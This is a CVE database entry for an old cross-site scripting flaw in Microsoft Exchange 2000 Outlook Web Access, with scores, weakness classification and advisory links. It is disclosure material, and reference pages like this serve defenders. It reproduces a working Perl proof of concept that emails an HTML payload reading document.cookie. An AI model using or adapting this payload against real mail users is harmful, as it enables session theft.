CVE-2006-1193 : Detail

CVE-2006-1193

Cross-site Scripting
A03-Injection
86.21%V3
Network
2006-06-13
17h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing."

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28005

Publication date : 2006-06-12 22h00 +00:00
Author : Daniel Fabian
EDB Verified : Yes

source: https://www.securityfocus.com/bid/18381/info Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability. A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user. #!/usr/bin/perl use Net::SMTP; my $to = "recipient\@domain.tld"; my $sub = "Watch out - Cross Site Scripting Attack"; my $from = "originator\@domain2.tld"; my $smtp = "mail.example.tld"; my $cont = "<img alt='hugo\0abc' src='http://www.example.com/ imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)' alt='<s'\0"; $smtp = Net::SMTP->new($smtp); $smtp->mail("$from") || die("error 1"); $smtp->to("$to") || die("error 2"); $smtp->data() ; $smtp->datasend("To: $to\n") ; $smtp->datasend("From: $from\n") ; $smtp->datasend("Subject: $sub\n"); $smtp->datasend("Content-Type: text/html\n\n"); $smtp->datasend("$cont") ; $smtp->datasend("\n\n") ; $smtp->dataend() ; $smtp->quit() ; print "$cont\n\ndone\n";

Products Mentioned

Configuraton 0

Microsoft>>Exchange_server >> Version 2000

Microsoft>>Exchange_server >> Version 2000

Microsoft>>Exchange_server >> Version 2000

References

http://securitytracker.com/id?1016280
Tags : vdb-entry, x_refsource_SECTRACK
http://www.osvdb.org/26441
Tags : vdb-entry, x_refsource_OSVDB
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/18381
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2006/2326
Tags : vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/138188
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/20634
Tags : third-party-advisory, x_refsource_SECUNIA